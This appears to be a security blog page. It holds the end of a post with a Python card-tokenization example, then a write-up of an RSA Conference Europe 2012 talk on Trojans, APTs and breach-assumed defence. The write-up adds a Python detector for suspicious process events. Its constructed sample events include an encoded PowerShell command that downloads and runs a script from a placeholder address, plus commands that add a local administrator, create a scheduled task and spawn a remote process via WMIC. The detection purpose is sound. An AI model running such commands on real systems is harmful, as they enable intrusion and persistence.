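Tokenization is the one of the four terms defined above that actually addresses the processing gap, so here is an added Python example (mine, not from the talk) of a token vault: a card number is replaced by a random token of the same length that keeps the last four digits, so downstream systems can do routing and customer lookups on the token alone, and only the vault can reverse it. Tokens are generated to fail the Luhn check so one can never be mistaken for, or used as, a live card number. The card number is a widely published test number and the vault is an in-memory dictionary standing in for a hardened, access-controlled service.

```python
"""Format-preserving tokenization with a vault that alone can reverse tokens (added example)."""
import secrets
import string


def luhn_valid(digits):
    """Standard Luhn (mod 10) check used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(pan):
    """What downstream systems are allowed to show: the last four digits only."""
    return "*" * (len(pan) - 4) + pan[-4:]


class TokenVault:
    """Reversible substitution: the token has no inherent value, the vault holds the mapping."""

    def __init__(self):
        self._to_pan = {}
        self._to_token = {}

    def tokenize(self, pan):
        if not (pan.isdigit() and 13 <= len(pan) <= 19 and luhn_valid(pan)):
            raise ValueError("not a well-formed card number")
        if pan in self._to_token:            # same input -> same token, so joins still work
            return self._to_token[pan]
        while True:
            body = "".join(secrets.choice(string.digits) for _ in range(len(pan) - 4))
            token = body + pan[-4:]            # preserve length and last four for processing
            # Reject collisions and anything that could pass as a real card number.
            if token not in self._to_pan and not luhn_valid(token):
                break
        self._to_pan[token] = pan
        self._to_token[pan] = token
        return token

    def detokenize(self, token):
        return self._to_pan[token]            # KeyError for unknown tokens


def process_without_vault(token, amount):
    """A downstream step that needs only the last four digits and never sees the PAN."""
    return {"last4": token[-4:], "display": mask(token), "amount": amount}


TEST_PAN = "4111111111111111"  # widely published test card number, not a live card

if __name__ == "__main__":
    vault = TokenVault()
    token = vault.tokenize(TEST_PAN)
    print("token:", token, "passes Luhn:", luhn_valid(token))
    print("processing on the token alone:", process_without_vault(token, 42.50))
    print("vault reverses it:", vault.detokenize(token) == TEST_PAN)
```

This only solves processing that can live on the non-sensitive remainder (last four digits, amounts, counts). Anything that needs the full value still has to be detokenized inside the trust boundary, which is exactly the hole the talk left open.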

K

RSA Conference Europe 2012 – They’re inside… Now what?

Eddie Schwartz – CISO, RSA and Uri Rivner – Head of cyber strategy, Biocatch

The talk started with some discussion around general Trojan attacks against companies, rather than long term high tech APTs, with the tagline; If these are random attacks.. We’re screwed!

Worth checking the pitch, but there was a series of examples from the RSA lab in Israel of usernames and passwords and other data that Trojans had sent to C&C servers in Russia.  These included banks, space agencies, science agencies, nuclear material handling companies etc.

So what do the controllers of these Trojans do with the data?  Remember these are random attacks collecting whatever personal data they can get, not specific targeted attacks.  A common example is to sell the data; you can find examples of the criminals on message boards etc. offering banking, government and military credentials for sale.

Moving on to examples of specifically targeted attacks and APTs..  Examples of targeted attacks include Ghostnet, Aurora, Night Dragon, Nitro and Shady RAT.  These have attacked everything from large private companies, to critical infrastructure, to the UN.  All of the given examples had one thing in common – social engineering.  Every one used spear phishing as their entry vector.

From this I think you need to consider – do you still think security awareness training shouldn’t be high on your organisation’s to-do list?

The talk went on to discuss Stuxnet and Duqu, along with their similarities and differences, largely what was captured in my last post.  The interesting observation here was their likely different places in the attack process.  Stuxnet was at the end and was the actual attack; Duqu was likely much earlier in the process as it was primarily for information gathering.

A whole lot more targeted malware examples were given including Jimmy, Munch, Snack, Headache etc.  Feel free to look these up if you want to do some further research.

A very recent example of a targeted attack that was only discovered in July of this year is VOHO.  This campaign was heavily targeted on geopolitical and defence targets in Boston, Washington and New York.  It was a multi-stage campaign heavily reliant on JavaScript.  While focused on specific target types the attack was very broad, hitting over 32000 unique hosts and successfully infecting nearly 4000.  This is actually a very good success rate, with the campaign no doubt considered a success by those instigating it..

In light of this evidence it is clear we need a new security doctrine.  You will get hacked despite your hard work; if it has not yet happened, it will..  Learn from the event: an honest evaluation of faults and gaps should result in improvements.

Things to consider as part of this new doctrine;

–          Resist – Threat resistant virtualisation, Zero day defences

–          Detect – Malware traces, Big data analytics, behavioural profiling

–          Investigate – Threat analysis, Forensics and reverse engineering

–          Cyber Intelligence – Threat and Adversary intelligence

Cyber Intelligence was covered in some more specific details around how we can improve this;

–          External visibility – Industry / sector working groups, government, trusted friends and colleagues, vendor intelligence;

  • Can this information be quickly accessed?  For speed it should be in machine readable format, but use whatever works!

–          Internal visibility – Do you have visibility in every place it is needed: HTTP, email, DNS, sensitive data etc.?

  • Do you have the tools in place to make use of and analyse all of these disparate data sources?

–          Can you identify when commands like NET and the task scheduler etc. are being used?

–          Do you have visibility of data exfiltration, scripts running, PowerShell, WMIC (Windows Management Instrumentation Command-line) etc.?

–          Do you have the long term log management and correlation in place to put all the pieces of these attacks together?
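Those questions about NET, schedulers, PowerShell and WMIC are answerable with fairly simple logic once you collect process-creation telemetry. The added Python example below (mine, not from the talk) runs a handful of rules over a constructed set of process-creation events: NET commands that add accounts or change local groups, scheduled task creation, process creation via WMIC (noting remote targets), hidden or encoded PowerShell (decoding the -EncodedCommand payload so the analyst sees what it would run), and an Office application spawning a shell. Host names, account, addresses and the encoded script are all invented, and the pipe-separated field layout is a simplification rather than any product's log schema.

```python
"""Rule-based detection over process-creation events (added example)."""
import base64
import re

# Constructed encoded PowerShell payload: what -EncodedCommand actually carries is
# base64 of the UTF-16LE script text.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')".encode("utf-16-le")
).decode()

# Constructed events (not real telemetry): time|host|user|parent_image|image|command_line
EVENTS = [
    r"2012-10-11T09:14:02Z|WKS-042|acme\jsmith|explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c dir",
    r"2012-10-11T09:14:30Z|WKS-042|acme\jsmith|cmd.exe|C:\Windows\System32\net.exe|net localgroup administrators backup_svc /add",
    r"2012-10-11T09:15:01Z|WKS-042|acme\jsmith|cmd.exe|C:\Windows\System32\schtasks.exe|schtasks /create /tn Updater /tr C:\Users\Public\u.exe /sc minute /mo 30",
    r'2012-10-11T09:15:40Z|WKS-042|acme\jsmith|cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic /node:FS-01 process call create "cmd.exe /c whoami"',
    "2012-10-11T09:16:12Z|WKS-042|acme\\jsmith|winword.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -nop -w hidden -enc " + ENCODED,
    r"2012-10-11T09:20:00Z|WKS-042|acme\jsmith|explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe notes.txt",
]

OFFICE = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# (rule name, severity, pattern over the command line)
RULES = [
    ("account or local group change via NET", "high",
     re.compile(r"\bnet1?(\.exe)?\s+(user|localgroup|group)\b.*\s/add\b", re.I)),
    ("scheduled task creation", "medium",
     re.compile(r"\b(schtasks(\.exe)?\s.*/create|at(\.exe)?\s+\d)", re.I)),
    ("process creation via WMIC", "high",
     re.compile(r"\bwmic(\.exe)?\b.*\bprocess\s+call\s+create\b", re.I)),
    ("encoded or hidden PowerShell", "high",
     re.compile(r"\bpowershell(\.exe)?\b.*\s-(enc|encodedcommand|ec|w(indowstyle)?\s+hidden)\b", re.I)),
]
ENC_ARG = re.compile(r"\s-(?:enc|encodedcommand|ec)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Recover the script behind -EncodedCommand, or None if there is none / it is malformed."""
    match = ENC_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(events):
    """Apply every rule to every event; return one alert dict per rule hit."""
    alerts = []
    for line in events:
        time, host, user, parent, image, cmdline = line.split("|", 5)
        image_name = image.rsplit("\\", 1)[-1].lower()
        parent_name = parent.lower()
        for name, severity, pattern in RULES:
            if pattern.search(cmdline):
                alert = {"time": time, "host": host, "user": user, "rule": name,
                         "severity": severity, "cmdline": cmdline}
                decoded = decode_encoded_command(cmdline)
                if decoded:
                    alert["decoded"] = decoded
                if "wmic" in image_name and "/node:" in cmdline.lower():
                    alert["note"] = "remote target: check for lateral movement"
                alerts.append(alert)
        if parent_name in OFFICE and image_name in SHELLS:
            alerts.append({"time": time, "host": host, "user": user,
                           "rule": "Office application spawned a shell",
                           "severity": "high", "cmdline": cmdline})
    return alerts


if __name__ == "__main__":
    for alert in analyse(EVENTS):
        print(f"{alert['time']} {alert['severity']:<6} {alert['rule']}: {alert['cmdline'][:60]}")
        if "decoded" in alert:
            print("    decoded:", alert["decoded"])
        if "note" in alert:
            print("    note:", alert["note"])
```

Five alerts come out of six events; the plain `cmd.exe /c dir` and notepad entries are left alone. The decoding step matters more than it looks: an analyst who only sees `-enc` followed by base64 has a suspicion, while one who sees `DownloadString` and the address it pulls from has an indicator to hunt for on every other host. Rules like these need the long-term, correlated logging the next question asks about; without it you see the individual hits but not the chain.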

Summary recommendations and call to action..

–          Assume you are breached on a daily basis and focus on adversaries, TTPs and their targets

–          Develop architecture and tools for internal and external intelligence for real-time and post-facto visibility into threats

–          Understand current state of malware, attack trends, scenarios, and communications

–          Adjust security team skills and incident management work flow

–          Learn from this and repeat the cycle..

Next steps (call to action!);

–          Evaluate your defence posture against APTs, and take the advice from the rest of this post

–          Evaluate your exposure to random intrusions (e.g. data stealing Trojans), and take the advice from the rest of this post

Useful presentation from a technical and security team standpoint, but completely missed the human and security awareness training aspect – despite highlighting that all the example APTs used spear phishing to get in the door.  I’d recommend following all the advice of this talk and then adding a solid security awareness program for all employees and really embedding this into the company philosophy / culture.

K